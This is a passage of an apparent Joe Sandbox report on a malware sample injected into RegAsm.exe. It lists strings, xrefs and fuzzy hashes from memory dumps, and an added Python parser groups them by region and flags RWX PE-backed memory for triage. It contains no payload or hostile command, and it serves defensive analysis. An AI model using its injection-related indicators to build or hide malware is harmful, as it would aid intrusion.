                                • double initialized or corrupted critical section, xrefs: 02C95508
                                • Address of the debug info found in the active list., xrefs: 02C954AE, 02C954FA
                                • 8, xrefs: 02C952E3
                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02C954CE
                                • Critical section address., xrefs: 02C95502
                                • Invalid debug info address of this critical section, xrefs: 02C954B6
                                • Thread identifier, xrefs: 02C9553A
                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02C9540A, 02C95496, 02C95519
                                • undeleted critical section in freed memory, xrefs: 02C9542B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                • API String ID: 0-2368682639
                                • Opcode ID: b16d77930f09d0854a59d78cb678c32d7e3703f6440a0280d513d219fb98913b
                                • Instruction ID: 5cd1c8da883b7780ef546fb399c0569bc0616a43104dd06fe04647dd6e93f410
                                • Opcode Fuzzy Hash: b16d77930f09d0854a59d78cb678c32d7e3703f6440a0280d513d219fb98913b
                                • Instruction Fuzzy Hash: 3F81AEB0A40358EFEF21CF95C885BAEBBF9BB48714F508269F509B7680D371A941CB50
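The entries above and below are machine-generated and repetitive, and two things in them are worth pulling out systematically: which API calls and function start addresses belong to the PE dumped at 00400000 (the payload injected into RegAsm.exe), and the fact that the dumps at 02BF0000 carry ntdll's own diagnostic text (`minkernel\ntdll\ldrinit.c`, the heap and critical-section debug messages). The page does not say what that second region is; an analyst would compare it with the loaded ntdll base before drawing a conclusion. The parser below is an added example, not part of the Joe Sandbox report, and its sample input is constructed from lines copied from this page. The reading of the `.sdmp` file-name fields (field 4 taken as the Win32 page protection, 0x40 = PAGE_EXECUTE_READWRITE) and the triage heuristics in `triage()` are assumptions of this example, not documented Joe Sandbox semantics.

```python
"""Parse Joe Sandbox function-metadata entries (bullet blocks that end with an
"Instruction Fuzzy Hash" line) into records, then group them by dumped region."""
import re
from collections import defaultdict

# Constructed sample: entries copied from this report page.
SAMPLE = r"""control_flow_graph 197 42d1a3-42d1e4 call 4048f3 call 42e073 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5A8279,00000007,00000000,00000004,00000000,004177C9,000000F4), ref: 0042D1DF
Memory Dump Source
• Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: FreeHeap
• String ID:
• Instruction Fuzzy Hash: 59E06DB22002147BD614EE59DC42EAB37ADEFC4714F008419FE08A7242D671B91186B8
control_flow_graph 212 2c62c0a-2c62c0f 213 2c62c11-2c62c18 212->213 214 2c62c1f-2c62c26 LdrInitializeThunk 212->214
APIs
Memory Dump Source
• Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
• API ID: InitializeThunk
• Instruction Fuzzy Hash: 84B09B719419C5D9EA11E7604A0C717790167D0711F15C171D7030641E4738C1D1F176
Strings
Memory Dump Source
• Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
• API ID:
• String ID: @$@$CFGOptions$GlobalFlag$LdrpInitializeExecutionOptions$minkernel\ntdll\ldrinit.c
• Instruction Fuzzy Hash: 0C92AC71608392AFE720CF24C8A4B6BB7E9BF84758F04492DFA95D7250D770E944CB92
Strings
• corrupted critical section, xrefs: 02C954C2
• Critical section address, xrefs: 02C95425, 02C954BC, 02C95534
Memory Dump Source
• Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
• String ID: Critical section address$corrupted critical section
• Instruction Fuzzy Hash: 3F81AEB0A40358EFEF21CF95C885BAEBBF9BB48714F508269F509B7680D371A941CB50
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (\S+)\.sdmp, Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
XREF_RE = re.compile(r"^• (.+), xrefs: ([0-9A-Fa-f]+(?:, [0-9A-Fa-f]+)*)$")
RANGE_RE = re.compile(r"\b[0-9a-f]+-[0-9a-f]+\b")   # basic-block ranges in the graph line
PAGE_EXECUTE_READWRITE = 0x40                       # Win32 memory-protection constant


def new_entry():
    return {"func_start": None, "apis": [], "api_id": "", "strings": [],
            "xrefs": {}, "source": None, "fuzzy_hash": None}


def parse_source(name, offset, pe_backed):
    # Assumption: dotted .sdmp name is <proc>.<n>.<id>.<base>.<protect>...;
    # field 4 is read as the page protection. Base is cross-checked with Offset.
    f = name.split(".")
    base = int(f[3], 16)
    if base != int(offset, 16):
        raise ValueError(f"base {base:#x} disagrees with Offset {offset}")
    return {"base": base, "protect": int(f[4], 16), "pe_backed": pe_backed}


def parse_entries(text):
    entries, cur = [], new_entry()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph "):
            starts = [int(r.split("-")[0], 16) for r in RANGE_RE.findall(line)]
            cur["func_start"] = min(starts) if starts else None
        elif m := API_RE.match(line):
            cur["apis"].append({"api": m[1], "module": m[2],
                                "args": m[3].split(","), "ref": int(m[4], 16)})
        elif m := SRC_RE.match(line):
            cur["source"] = parse_source(m[1], m[2], m[3] == "true")
        elif m := XREF_RE.match(line):
            cur["xrefs"][m[1]] = [int(a, 16) for a in m[2].split(", ")]
        elif line.startswith("• API ID:"):
            cur["api_id"] = line[len("• API ID:"):].strip()
        elif line.startswith("• String ID:"):
            cur["strings"] = [s for s in line[len("• String ID:"):].strip().split("$") if s]
        elif line.startswith("• Instruction Fuzzy Hash: "):
            cur["fuzzy_hash"] = line.split(": ", 1)[1]
            entries.append(cur)                     # the hash line closes an entry
            cur = new_entry()
    return entries


def summarize(entries):
    """Group records by the base address of the dumped region they came from."""
    regions = defaultdict(lambda: {"apis": set(), "functions": set(), "ntdll_paths": set(),
                                   "pe_backed": False, "protect": None})
    for e in entries:
        if not e["source"]:
            continue
        r = regions[e["source"]["base"]]
        r["pe_backed"], r["protect"] = e["source"]["pe_backed"], e["source"]["protect"]
        if e["func_start"] is not None:
            r["functions"].add(e["func_start"])
        r["apis"].update(f'{a["module"]}!{a["api"]}' for a in e["apis"])
        r["ntdll_paths"].update(s for s in e["strings"] if s.lower().startswith("minkernel\\ntdll\\"))
    return dict(regions)


def triage(regions):
    """Heuristic follow-up notes for the analyst (assumed rules, not a verdict)."""
    notes = {}
    for base, r in regions.items():
        reasons = []
        if r["pe_backed"] and r["protect"] == PAGE_EXECUTE_READWRITE:
            reasons.append("PE-backed region in RWX memory")
        if r["ntdll_paths"]:
            reasons.append("carries ntdll source-path strings: compare with the loaded ntdll base")
        if reasons:
            notes[base] = reasons
    return notes


if __name__ == "__main__":
    regs = summarize(parse_entries(SAMPLE))
    for base, reasons in sorted(triage(regs).items()):
        print(f"{base:#010x}: {'; '.join(reasons)}  apis={sorted(regs[base]['apis'])}")
```

Feed it the full text of this section and the per-region view falls out: the 00400000 image accounts for the native calls (RtlFreeHeap, ExitProcess), while every entry carrying `minkernel\ntdll\...` paths sits in the 02BF0000 dumps. The `xrefs` dictionary keeps the string-to-address mapping from the "Strings" sub-lists, which is what you need when pivoting into the IDA snapshot.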
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                • API String ID: 0-3591852110
                                • Opcode ID: d245df69ed37b975f8b67dd6ebe7b45fc0d5db62199149b26cc90df272711f46
                                • Instruction ID: 8ffcd061b4738cd54277b45f9bfe2132f506e5a952450bf5fde764c8a1d11d59
                                • Opcode Fuzzy Hash: d245df69ed37b975f8b67dd6ebe7b45fc0d5db62199149b26cc90df272711f46
                                • Instruction Fuzzy Hash: 7212F034600642DFDB25CF29C441BBABBF2FF49718F088459E68A8B651E7B4E981DF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                • API String ID: 0-3532704233
                                • Opcode ID: 92b0290af369767dff3244370506330c5291bdb269aca4a385c9bc2f4f3a232c
                                • Instruction ID: 08d8a9dc35f8dd15387793d7f6b5970d3c6d4c02c1bc9f484995e1043a5b907a
                                • Opcode Fuzzy Hash: 92b0290af369767dff3244370506330c5291bdb269aca4a385c9bc2f4f3a232c
                                • Instruction Fuzzy Hash: A0B17BB25083519BC715DE24C481B6FB7E9AFC9754F01492EF98AD7200D730DA45EB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                • API String ID: 0-3063724069
                                • Opcode ID: c2f9f1775c0dfa7702da4117d90c69079cdbc765395732460f90e7dae4dbb3b1
                                • Instruction ID: 8fc8ea09d5e55be54a60b4de66007223c3376b9ed396be3b2f2dc1bffce074a9
                                • Opcode Fuzzy Hash: c2f9f1775c0dfa7702da4117d90c69079cdbc765395732460f90e7dae4dbb3b1
                                • Instruction Fuzzy Hash: C9D1F572808391AFD722DB64C884BABB7E9AFC4754F040A29FB8497250D774DD488FD2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 0-1700792311
                                • Opcode ID: 083b445425cfce4228a05b7d011b21ea8d18168a69de2643d7993f818a955e35
                                • Instruction ID: 4e0b5e23024e5f98d84c1b657c0d0fbf0f3e863fa339741cdfabd8dad56b8c8a
                                • Opcode Fuzzy Hash: 083b445425cfce4228a05b7d011b21ea8d18168a69de2643d7993f818a955e35
                                • Instruction Fuzzy Hash: A9D12135900685EFDB12DF6CD401AADBBF2FF8A708F088059E9469B612C730EA42DF54
                                Strings
                                • @, xrefs: 02C1D313
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02C1D2C3
                                • @, xrefs: 02C1D0FD
                                • @, xrefs: 02C1D2AF
                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 02C1D196
                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02C1D146
                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02C1D262
                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02C1D0CF
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                • API String ID: 0-1356375266
                                • Opcode ID: c0d6dd2c46ffdcff5304f9aa670ecad0f5fbfe28464578daea311904b291d1a5
                                • Instruction ID: 8584696e3127dda91fdc775ebf66c763e786b47d68089fcd6218f77bfa810ff9
                                • Opcode Fuzzy Hash: c0d6dd2c46ffdcff5304f9aa670ecad0f5fbfe28464578daea311904b291d1a5
                                • Instruction Fuzzy Hash: 03A17A719083459FD321CF21C885B6BB7E8BB89729F00492EFA9996240D774DA48DF93
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-523794902
                                • Opcode ID: 6b1bad60f02a5d76f0db3aa1e1c84968194d454da9e5cc60cde3dcccaaa5071c
                                • Instruction ID: ae55aef69cc70629b0d52ffd7371ee7199af90968b2b11417f8d70cfce346306
                                • Opcode Fuzzy Hash: 6b1bad60f02a5d76f0db3aa1e1c84968194d454da9e5cc60cde3dcccaaa5071c
                                • Instruction Fuzzy Hash: 2342FE322083819FD715DF29C885B2ABBE6FF89308F0449ADE8868B751D734D941DF92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-122214566
                                • Opcode ID: 763376da34f072d7e81c7f0eafcd605eadf53c0d3bdd8abfada007f2ec901136
                                • Instruction ID: 3693fcc0a8a468097c7d55814d2a75eb67408a7e3dbb042003d9ce401b01ad56
                                • Opcode Fuzzy Hash: 763376da34f072d7e81c7f0eafcd605eadf53c0d3bdd8abfada007f2ec901136
                                • Instruction Fuzzy Hash: 66C1B031A002199BDB269F64C890B7EB765FF8431CF1489A9ED06EB690DF70CE44D791
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-792281065
                                • Opcode ID: b0cc6c9ae17714e4d8a59f2d5bc132469c88fd913e43fb9a83e4d6e97541ecc1
                                • Instruction ID: e8ad912653338c0ad58352a6ee1e68e95b57c2879135b0241b00a7556f0930ca
                                • Opcode Fuzzy Hash: b0cc6c9ae17714e4d8a59f2d5bc132469c88fd913e43fb9a83e4d6e97541ecc1
                                • Instruction Fuzzy Hash: 5C915930E40721ABEF39DF54E848B6A77A9BF81B28F500168ED0167B80D774DD82CB95
                                Strings
                                • LdrpInitializeProcess, xrefs: 02C5C6C4
                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 02C981E5
                                • Loading import redirection DLL: '%wZ', xrefs: 02C98170
                                • minkernel\ntdll\ldrredirect.c, xrefs: 02C98181, 02C981F5
                                • LdrpInitializeImportRedirection, xrefs: 02C98177, 02C981EB
                                • minkernel\ntdll\ldrinit.c, xrefs: 02C5C6C3
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-475462383
                                • Opcode ID: a03b80f3b27560c11bfe971f24ac92eabc05226cf519ed083a251b83f88d0955
                                • Instruction ID: 31edc892ac1c48d338fecf60b2a97af6200756824ece1f173a1b9e44ed113111
                                • Opcode Fuzzy Hash: a03b80f3b27560c11bfe971f24ac92eabc05226cf519ed083a251b83f88d0955
                                • Instruction Fuzzy Hash: CE311571784341AFD310EF28DC4AE1BB7D6EF85B14F040598F9856B390DA60DE05DBA2
                                Strings
                                • RtlGetAssemblyStorageRoot, xrefs: 02C92160, 02C9219A, 02C921BA
                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02C9219F
                                • SXS: %s() passed the empty activation context, xrefs: 02C92165
                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02C92180
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02C921BF
                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02C92178
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                • API String ID: 0-861424205
                                • Opcode ID: bce92b019be3c01d0765de471b8559fc6d9eb1786f2c5518f247c9ecf4fe79b1
                                • Instruction ID: be6bdcee817d969844188de136e12d6e2f9458feb1d82542fbeb324e5ef77b36
                                • Opcode Fuzzy Hash: bce92b019be3c01d0765de471b8559fc6d9eb1786f2c5518f247c9ecf4fe79b1
                                • Instruction Fuzzy Hash: A3310432A4022577FB21CA95CC85F6AB7A9DF95B84F050169FE05B7240D770EE80CBA6
                                Strings
                                • Kernel-MUI-Language-SKU, xrefs: 02C4542B
                                • Kernel-MUI-Language-Allowed, xrefs: 02C4527B
                                • Kernel-MUI-Language-Disallowed, xrefs: 02C45352
                                • WindowsExcludedProcs, xrefs: 02C4522A
                                • Kernel-MUI-Number-Allowed, xrefs: 02C45247
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 0-258546922
                                • Opcode ID: 0b9cfe5fed8da4c35b1ee1f32635376e04a1014b492b70ded3d69c86ed38b61b
                                • Instruction ID: a4a22091731bb2ca8dfdf5c0dbd5dd66bf37fd2ff2bdf1cfc57fdb50b326b792
                                • Opcode Fuzzy Hash: 0b9cfe5fed8da4c35b1ee1f32635376e04a1014b492b70ded3d69c86ed38b61b
                                • Instruction Fuzzy Hash: 4CF14B72D10618EFCB12DF98C980AAFBBB9EF48794F55406AE505E7210DB749E01DFA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1975516107
                                • Opcode ID: c8a4bc1303ca76f5ee044edef0ff288182c3b291dedefda9c895539a98a6e57c
                                • Instruction ID: d48e81a8e8a11e02ce8f38023e6f3f1f86f8f13ce9cfcef8fa2357a2fdf8cfd6
                                • Opcode Fuzzy Hash: c8a4bc1303ca76f5ee044edef0ff288182c3b291dedefda9c895539a98a6e57c
                                • Instruction Fuzzy Hash: 0751F371E40345AFDB14EFA4D4847AEBBB2BF88708F144459D802AB681DB74A955CFD0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @,$@,$Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1924374964
                                • Opcode ID: 3862505af07eae4af2aefb2cdfcebd668b0bb9e2ee8d05b197750d3100bd84f4
                                • Instruction ID: 80738494b01dbf7f2887dc5adeda4a8c022d0f702aba4235f9660933d729a71b
                                • Opcode Fuzzy Hash: 3862505af07eae4af2aefb2cdfcebd668b0bb9e2ee8d05b197750d3100bd84f4
                                • Instruction Fuzzy Hash: 73412271980310BBDB20EB64D844B5B77E9EF89B90F00492AFD4983750EB70DE51DB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                • API String ID: 0-3061284088
                                • Opcode ID: df2513a24cba6d69e60a5fc5a745772bc3d86d1995a54d835837eccc0e5e79bb
                                • Instruction ID: 31e0a8acba57c50851412732feca07b5856158ca72c3cd75f690332e1238a0a4
                                • Opcode Fuzzy Hash: df2513a24cba6d69e60a5fc5a745772bc3d86d1995a54d835837eccc0e5e79bb
                                • Instruction Fuzzy Hash: DC01FC36155640EEF3259728F40BF96F7F4EB47B78F284099F00147A61CBA49C85EEA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: 4e1b92ab954377fea28558e72623927ffc0468bdf872ff767a06854671c48512
                                • Instruction ID: ac54be79e5d631f8283d24911c3cd630d59c4721ce627ee68b255fe7d5e2a9cf
                                • Opcode Fuzzy Hash: 4e1b92ab954377fea28558e72623927ffc0468bdf872ff767a06854671c48512
                                • Instruction Fuzzy Hash: AA13C3B0A00655DFDB26CF69C4907A9FBF1FF89304F148A99E849AB381D734A945CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-3570731704
                                • Opcode ID: edf5f02f9c0b65a53b86e150650c99cec67dca34cff05ae2197795b11012f7c9
                                • Instruction ID: 620c4bef00bf6280ad4be1a7bbcbbbc1d2a5819681b3106da74b816dde3d535b
                                • Opcode Fuzzy Hash: edf5f02f9c0b65a53b86e150650c99cec67dca34cff05ae2197795b11012f7c9
                                • Instruction Fuzzy Hash: A6924871A00268CFEB25DF19CC80BA9B7B6BF85354F0985EAD94DA7240D7B09E81CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                • API String ID: 0-379654539
                                • Opcode ID: 73fc192038814b9a97c6382d9fe89cc884ceb8fdec95a8f3109a8019c63bfa54
                                • Instruction ID: 296a77eec8f698c1820564e95b52643d783ee544affd0ceff3a802e665084d38
                                • Opcode Fuzzy Hash: 73fc192038814b9a97c6382d9fe89cc884ceb8fdec95a8f3109a8019c63bfa54
                                • Instruction Fuzzy Hash: 66C19A74108792CFD721DF29C544B6BB7E5FF84708F00896AF9968B250EB34DA49CB92
                                Strings
                                • SXS: %s() passed the empty activation context, xrefs: 02C921DE
                                • .Local, xrefs: 02C528D8
                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02C921D9, 02C922B1
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02C922B6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                • API String ID: 0-1239276146
                                • Opcode ID: 8205426a4274ab6e40768640218e1a7da0e66167f5aa380dc99099668968733c
                                • Instruction ID: 804343aad628c39b4d002d9c88c5b4643c2514a58ccc9fa84d16bbc8a89e65cd
                                • Opcode Fuzzy Hash: 8205426a4274ab6e40768640218e1a7da0e66167f5aa380dc99099668968733c
                                • Instruction Fuzzy Hash: 04A18C319002299BDB24CF65D888BA9B3B5BF98318F1541EADC48AB351D730DEC0CF96
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                • API String ID: 0-2586055223
                                • Opcode ID: 7c711ff9532f8e51c30ad3da6a4b21ceb6b6cec479b531fa8d564714eaad56fb
                                • Instruction ID: ca6a10b77f4a9e681f249f1bb5e69c178d058c9d7cae08203a95b4e8549483ca
                                • Opcode Fuzzy Hash: 7c711ff9532f8e51c30ad3da6a4b21ceb6b6cec479b531fa8d564714eaad56fb
                                • Instruction Fuzzy Hash: 3B6147322047809FE722DF68D845F2777E9FF85714F0408A8F9958B691C734E941EB62
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
